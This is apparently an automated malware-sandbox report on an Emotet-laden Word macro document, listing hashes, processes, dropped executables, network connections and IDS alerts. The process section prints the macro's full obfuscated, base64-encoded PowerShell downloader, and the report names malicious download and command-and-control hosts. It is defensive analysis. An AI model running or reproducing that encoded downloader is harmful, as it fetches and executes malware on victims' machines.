analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Receipt_03_2019_44703134.doc

Full analysis: https://app.any.run/tasks/383ade9b-fe50-4128-9eea-e760e0b5f6a4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 15, 2019, 01:43:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 13 20:55:00 2019, Last Saved Time/Date: Wed Mar 13 20:55:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0
MD5:

E2259BC657AA9F300E4CA2B40A2F72E7

SHA1:

1C50E621C8890A38B02C0E5096181C3510B85F4A

SHA256:

2E93E7C34EBF56A7DF68553DB3978FE84969E0689F6DF6FD66F04209D2A6EFA8

SSDEEP:

6144:A77HUUUUUUUUUUUUUUUUUUUT52VSJPCt3AdjZwOZ6:A77HUUUUUUUUUUUUUUUUUUUTCiZZ6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 100.exe (PID: 2392)
      • 100.exe (PID: 3480)
      • wabmetagen.exe (PID: 3532)
      • wabmetagen.exe (PID: 2856)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2856)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3532)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2292)
    • Application launched itself

      • 100.exe (PID: 2392)
      • wabmetagen.exe (PID: 2856)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2292)
      • 100.exe (PID: 3480)
    • Starts itself from another location

      • 100.exe (PID: 3480)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3524)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 5
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 5
Words: -
Pages: 1
ModifyDate: 2019:03:13 20:55:00
CreateDate: 2019:03:13 20:55:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 100.exe no specs 100.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Receipt_03_2019_44703134.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2292powershell -e IAAuACAAKAAoAGcAZQBUAC0AdgBBAFIAaQBBAEIAbABFACAAKAAnACoAbQBkACcAKwAnAFIAKgAnACkAKQAuAG4AYQBNAEUAWwAzACwAMQAxACwAMgBdAC0AagBvAGkAbgAnACcAKQAoACAAbgBFAFcALQBvAGIAagBlAEMAdAAgAHMAWQBTAFQARQBNAC4ASQBvAC4AcwB0AFIAZQBBAE0AcgBFAGEAZABlAHIAKAAoACAAbgBFAFcALQBvAGIAagBlAEMAdAAgACAAaQBPAC4AYwBPAE0AUAByAGUAcwBTAEkAbwBOAC4AZABlAGYAbABBAHQAZQBzAFQAcgBlAEEAbQAoAFsAUwBZAFMAVABFAG0ALgBJAG8ALgBNAEUAbQBvAHIAWQBTAFQAcgBFAEEAbQBdAFsAcwBZAHMAdABFAG0ALgBDAG8ATgBWAGUAcgB0AF0AOgA6AEYAcgBvAE0AYgBhAHMAZQA2ADQAUwBUAHIAaQBuAEcAKAAgACgAJwBYACcAKwAnAFoAJwArACcARgBSACcAKwAnAGIAJwArACcANQBzAHcARgBJACcAKwAnAFgALwBpAGgAJwArACcAKwBRAG4AQwAnACsAJwBnACcAKwAnAEwAJwArACcAaABEAGEAJwArACcAZAB0AGkASwAnACsAJwBrADMAbwBCAEcAJwArACcAMAAzAFMAVAAyACcAKwAnAGcAZwAnACsAJwB0AHEAaQAnACsAJwBaAFYAagAnACsAJwByAGsAQgBGADcAJwArACcAQQBSAE8ATwBBADEAeQBuACcAKwAnACsAJwArACcAZgBsADcAWABMACcAKwAnAE4AJwArACcATAAvACcAKwAnADQAMgB2AHAAOAA3ACcAKwAnAHIAbgBIAFQAdgAnACsAJwBJAEEAJwArACcAQQAnACsAJwBHAGwAJwArACcASQBVADQAZwAnACsAJwBUACcAKwAnAFcAJwArACcAOQBIACcAKwAnAEEASwBSADgAMgAnACsAJwA4ACcAKwAnAFEAQwAnACsAJwBoAHgARwBHACcAKwAnAHEAdAAnACsAJwBpAC8ASQBOAGYAJwArACcAbQAnACsAJwBHADIAdgAyAE8AJwArACcAMgAnACsAJwA2AGcAUwBLAEgAWAAnACsAJwBnAE0AJwArACcARQBqAEEAdwBGAE4ASQAnACsAJwBDADYAMgAnACsAJwBiACcAKwAnADcAJwArACcAdAByAHoAQgAnACsAJwB0AHkAeQAnACsAJwBpAGsAbQBXAEMAWgBlACcAKwAnAHIAMgAnACsAJwB0AHQAZgAnACsAJwA1ACcAKwAnAE8AcAAnACsAJwBLACcAKwAnAHoATAAzAGIAcAAnACsAJwBiAHEANwA5AEcANwBlAHEAUQBKACcAKwAnAGIAbwBWAG0ATwBOACcAKwAnAGIAJwArACcATwA3AHEATABIAEQAJwArACcAdABoAGMAJwArACcAYwB1ADkAJwArACcATwBiAG8AZgAnACsAJwBHAGEAMQAnACsAJwBXAHIAJwArACcAOQArAFkAeABiADAAYQAnACsAJwA1AEIAJwArACcAegBEAFQAeQAnACsAJwA0ACcAKwAnAG8AUQBJACcAKwAnAHYAJwArACcAeQAnACsAJwB4AG4AUgBuAGgAVgBmADMAJwArACcARwBtAG0AcABmAHkAVQBzAGgATQA2AFoAWQAnACsAJwBKAEsAJwArACcAVwBSACcAKwAnACsASQBqAHUAVQBtAFoARAAnACsAJwBjADYAKwBQAEgAMQB6ACcAKwAnACsAbwAnACsAJwBKAGYAJwArACcAVwAnACsAJwArAEwAVwB2ACcAKwAnAE0AJwArACcAbQBTAHQAUgAyADMAWgBUAHIAcQBTADIANAAzAGkAZgBHAHYAWABSAG8AJwArACcAKwA2ADYAcQBZACcAKwAnAFEAZQAwACcAKwAnAFIAcwA2ACcAKwAnAEQAcAB4AGIAVQBDACcAKwAnAFoAVwBJAFkAWABGAFkARAAnACsAJwBhAG4AVABDAEoAJwArACcAZQArAGkAJwArACcAWQBsAEkAYQBIACsAYgAnACsAJwBHAGIAUABlAG8AJwArACcAZwAnACsAJwBpACcAKwAnAEEARAArAGsAQQA4AEEAJwArACcAYwB3AEMAaAA3AGQAKwA4AC8AJwArACcAMgB3ACcAKwAnAEIATABQACcAKwAnADMAUgAnACsAJwBRACcAKwAnADkAJwArACcAdABkADcAJwArACcATwAxACcAKwAnADcAVAAnACsAJwBxAHAAMgBvAGMARQBKAC8AMABNAG0AJwArACcAYgB4AEkAUwA2ACcAKwAnAGEAJwArACcASgBBAEcAJwArACcATwAnACsAJwA5AFUAaQA0ADgAWABJAFcAYwBFACcAKwAnAHoAeABBAHEAQQBDACcAKwAnAEUAbgBlAGsAJwArACcAeAAnACsAJwAwAGYAJwArACcAZABQAHYAJwArACcAegA4AFAAWQBSACcAKwAnAGIAcQAnACsAJwB3AEcAVwBTACcAKwAnAG0AVwBmACcAKwAnAGIARgBTAFoALwA0ACcAKwAnAEQAJwArACcAKwBkACcAKwAnAHYAUQBPAG4ANAAxACcAKwAnAG8AQgBKACcAKwAnAFkAJwArACcASgBDAEYAOQBUAEIAZgBsAGIAJwArACcAOAB2AEwASABSAG0ATgBFACcAKwAnAHQAVAAnACsAJwBUAHAAJwArACcAYwBiADYASAAnACsAJwA5AGEAJwArACcAdABVAE8AYQA2AEkATgBNAGMAJwArACcAeQBYAHgAbQAxACcAKwAnADUAZwBjAGwAJwArACcAcgBKAFgASgBmADUASAAnACsAJwBCAHMANAAnACsAJwBkAHQANABXACcAKwAnAEoAUQB2ACcAKwAnAG8AVgAwAGcAJwArACcAMwB3AGoAJwArACcAYQAnACsAJwBIAEIAMQByAG8AdQAnACsAJwBnACsATwBSAE0AJwArACcAOAAyAEwAdwAvAEgAbwByAEgAMQA0AFcAdgBDAFEAMwBxAGMAbQBHAFMAJwArACcAQwAnACsAJwBoAHcAUwAnACsAJwA4AD0AJwApACAAKQAgACwAWwBzAFkAUwB0AGUATQAuAGkATwAuAGMAbwBtAFAAUgBFAFMAcwBpAG8AbgAuAGMAbwBtAHAAcgBFAFMAcwBJAG8ATgBtAG8ARABFAF0AOgA6AEQAZQBjAG8AbQBQAFIAZQBzAFMAIAApACAAKQAgACwAIABbAFQARQBYAFQALgBlAE4AYwBvAEQAaQBuAGcAXQA6ADoAQQBzAEMASQBJACkAKQAuAFIARQBBAGQAdABPAEUAbgBEACgAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2392"C:\Users\admin\100.exe" C:\Users\admin\100.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3480"C:\Users\admin\100.exe"C:\Users\admin\100.exe
100.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2856"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
100.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3532"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 746
Read events
1 316
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDDFD.tmp.cvr
MD5:
SHA256:
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SGL39W4QTDY3WWH2W5LR.temp
MD5:
SHA256:
3524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Receipt_03_2019_44703134.doc.LNKlnk
MD5:7D403E76492D4FA806505F6FF32A870A
SHA256:75FBCF3FDBFBFB55A656B8B12C26D5C4495B0E7FBA3499BD970AA2C6C44FD7D2
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ae783.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
2292powershell.exeC:\Users\admin\100.exeexecutable
MD5:91B84E358A3A44816B33537A7CC606A9
SHA256:E44D3DC2A07FC182396CD0DD54E76908D076883BE4B19AE7A7D67E8A9E6FC640
3524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2A891164FE91BA6AC05B0BF649A261EA
SHA256:DBE2D12E45090C02E4A69E55CEC720728F1BD7706358E7ED5CE8E9FC4F94AD32
3524WINWORD.EXEC:\Users\admin\Downloads\~$ceipt_03_2019_44703134.docpgc
MD5:6684155068D0C346BC748E7824E46A0E
SHA256:4C2C2DAF3DFD62E7C5E144EC3071EC86A0D43EC0CA77C968402D433B619F262E
3480100.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:91B84E358A3A44816B33537A7CC606A9
SHA256:E44D3DC2A07FC182396CD0DD54E76908D076883BE4B19AE7A7D67E8A9E6FC640
3524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:9E3E19085A3FD337B1DAB5F63D16E5EF
SHA256:0C4CF47D3E7D8A36F50FB86F9C64CAA3EAD948549417DB4308AF8BF19EBB6009
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3532
wabmetagen.exe
POST
200
82.78.228.57:443
http://82.78.228.57:443/xian/forced/nsip/
RO
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2292
powershell.exe
74.63.240.162:443
heritagemaritimeservices.com
Limestone Networks, Inc.
US
unknown
2292
powershell.exe
185.93.71.204:443
webalanadi.com
Dgn Teknoloji A.s.
TR
malicious
2292
powershell.exe
204.152.208.130:443
webspeedtech.com
QuadraNet, Inc
US
suspicious
3532
wabmetagen.exe
82.78.228.57:443
RCS & RDS
RO
malicious

DNS requests

Domain
IP
Reputation
webalanadi.com
  • 185.93.71.204
malicious
heritagemaritimeservices.com
  • 74.63.240.162
unknown
webspeedtech.com
  • 204.152.208.130
unknown

Threats

PID
Process
Class
Message
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record/traffic
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record/traffic
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record/traffic
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record/traffic
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2292
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record/traffic
No debug info